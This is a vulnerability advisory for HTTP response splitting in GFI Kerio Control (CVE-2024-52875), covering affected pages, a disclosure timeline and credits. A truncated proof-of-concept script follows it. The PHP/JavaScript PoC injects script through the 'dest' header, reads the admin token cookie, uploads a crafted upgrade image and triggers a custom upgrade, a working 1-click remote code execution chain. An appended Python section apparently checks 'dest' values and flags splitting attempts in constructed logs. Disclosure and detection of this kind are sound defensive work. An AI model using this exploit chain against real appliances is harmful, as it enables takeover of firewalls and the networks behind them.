---------------------------------------------------------------------------
GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
---------------------------------------------------------------------------

[-] Software Links:

https://gfi.ai/products-and-solutions/network-security-solutions/keriocontrol
http://download.kerio.com

[-] Affected Versions:

All versions from 9.2.5 to 9.4.5.

[-] Vulnerabilities Description:

There are multiple HTTP Response Splitting vulnerabilities in GFI Kerio Control. The following are some of the affected pages:

- /nonauth/addCertException.cs
- /nonauth/guestConfirm.cs
- /nonauth/expiration.cs

User input passed to these pages via the "dest" GET parameter is not properly sanitized before being used to generate a "Location" HTTP header in a 302 HTTP response. Specifically, the application does not correctly filter/remove linefeed (LF) characters. This can be exploited to perform HTTP Response Splitting attacks, which in turn might allow carrying out Reflected Cross-Site Scripting (XSS) and possibly other attacks.

NOTE: the Reflected XSS vector might be abused to perform 1-click Remote Code Execution (RCE) attacks.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2024-52875.php

[ Packet Storm note: See bottom for poc ]

[-] Solution:

No official solution is currently available.
[-] Disclosure Timeline:

[06/11/2024] - Vulnerability details sent to the vendor
[07/11/2024] - Vendor response stating "we’ll take steps to resolve these vulnerabilities in coming releases of Kerio Control"
[07/11/2024] - CVE identifier requested
[17/11/2024] - CVE identifier assigned
[17/11/2024] - Vendor was contacted inquiring about the ETA for the next Kerio Control release; no response
[28/11/2024] - Vendor was contacted again and provided with a 1-click RCE Proof of Concept script, emphasizing these should be considered high-risk vulnerabilities that should be addressed as soon as possible
[28/11/2024] - Vendor response stating "thank you very much for this information, I will immediately consult with rest of the team"
[03/12/2024] - Vendor email stating "would you mind to share with us any script you used while exploiting the vulnerabilities?"
[03/12/2024] - Proof of Concept script and replication steps sent to the vendor, along with a follow-up inquiry about the ETA for a patched Kerio Control version; no response
[06/12/2024] - Vendor was informed that public disclosure is scheduled to occur within two weeks
[11/12/2024] - Vendor response stating "these vulnerabilities were already fixed and will be part of Kerio Control 9.4.5p1 which is now with our internal QA team"
[16/12/2024] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-52875 to these vulnerabilities.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-07

[-] Technical Writeup:

https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875

-------------------------

url = "https://' . $target . ':4081/admin";
_token = "";
_id = "";

function createIFrame(file, id) {
    iframe = document.createElement("iframe");
    iframe.src = url + "/constants.js";
    iframe.style.display = "none";
    iframe.sandbox = "allow-scripts allow-same-origin";
    iframe.onload = function() {
        cookie = iframe.contentWindow.document.cookie;
        var re = new RegExp(name + "=([^;]+)");
        var value = re.exec(cookie);
        var token = (value != null) ? unescape(value[1]) : null;
        uploadImage(file, id, token);
    };
    document.body.appendChild(iframe);
}

function uploadImage(file, id, token) {
    _id = id;
    _token = token;
    var xhr = new XMLHttpRequest();
    xhr.open("POST", url + "/api/jsonrpc/", true);
    xhr.addEventListener("load", performCustomUpgrade);
    xhr.setRequestHeader("X-Token", token);
    xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));
}

function performCustomUpgrade() {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", url +"/api/jsonrpc/", true);
    xhr.setRequestHeader("X-Token", _token);
    xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id}}));
}

var xhr = new XMLHttpRequest();
xhr.open("POST", url + "/api/jsonrpc/upload/", true);
xhr.addEventListener("load", function() {
    obj = JSON.parse(this.responseText);
    file = obj.result.fileUpload.name;
    id = obj.result.fileUpload.id;
    createIFrame(file, id);
});
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1337");
xhr.withCredentials = true;

var body = "-----------------------------1337\r\n" +
           "Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" +
           "Content-Type: application/octet-stream\r\n" +
           "\r\n" +
           atob("' . $upgrade . '") +
           "\r\n-----------------------------1337--\r\n";

var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
';

$body = zlib_encode($body, ZLIB_ENCODING_DEFLATE);
$payload = (preg_match("/Firefox/", $_SERVER["HTTP_USER_AGENT"])) ? "resource://xss" : "";
$payload .= "\nContent-Length: " . strlen($body);
$payload .= "\n\n{$body}";
header("Location: https://{$target}:4081/nonauth/guestConfirm.cs?dest=" . urlencode(base64_encode($payload)));
?>
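The description above pins the flaw down to one thing: a "dest" value reaching the Location header with an unfiltered LF. The following is an added defensive example in Python, not code from the advisory, its author or GFI: the check a redirect handler should apply to the decoded "dest" before emitting a Location header, and the same check run as a detector over constructed access-log lines for the three affected pages. It assumes, from the PoC's urlencode(base64_encode(...)), that the appliance base64-decodes "dest"; the log format, addresses and values are constructed.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Pages the advisory lists as building a 302 "Location" header from "dest".
AFFECTED_PATHS = {"/nonauth/addCertException.cs",
                  "/nonauth/guestConfirm.cs", "/nonauth/expiration.cs"}
# A CR, LF or NUL inside a header value ends the header or the header block.
CTL_CHARS = re.compile(r"[\r\n\x00]")


def decode_dest(dest):
    """Assumption drawn from the PoC: the appliance base64-decodes "dest".
    Undo that when the value is valid base64, else keep the URL-decoded text."""
    try:
        return base64.b64decode(dest, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return dest


def safe_location(dest):
    """Check a redirect handler must run on the *decoded* value: return the
    target when it contains no CR/LF/NUL, None when it must be rejected."""
    target = decode_dest(dest)
    return None if CTL_CHARS.search(target) else target


def flag_splitting_attempts(log_lines):
    """Return (path, decoded dest) for requests to the affected pages whose
    "dest" would split the response; ordinary redirects are not reported."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if parts.path not in AFFECTED_PATHS:
            continue
        for dest in parse_qs(parts.query).get("dest", []):  # %xx already undone
            if safe_location(dest) is None:
                hits.append((parts.path, decode_dest(dest)))
    return hits


def b64q(text):  # encodes a sample "dest" the way the PoC does: base64, then URL-encode
    return quote(base64.b64encode(text.encode()).decode())


PREFIX = '203.0.113.9 - - [16/Dec/2024:10:00:02 +0000] "GET '
SAMPLE_LOG = [  # constructed access-log lines, not taken from a real appliance
    PREFIX + '/nonauth/guestConfirm.cs?dest=' + b64q("https://intranet.example/") + ' HTTP/1.1" 302 0',
    PREFIX + '/nonauth/expiration.cs?dest=' + b64q("https://intranet.example/\nX-Injected: 1") + ' HTTP/1.1" 302 0',
    PREFIX + '/login.cs?dest=x%0aY HTTP/1.1" 200 0',
]
```

The second sample line is the only one reported: its decoded "dest" carries an LF, so emitting it in a Location header would start a second header line, which is exactly what the check refuses.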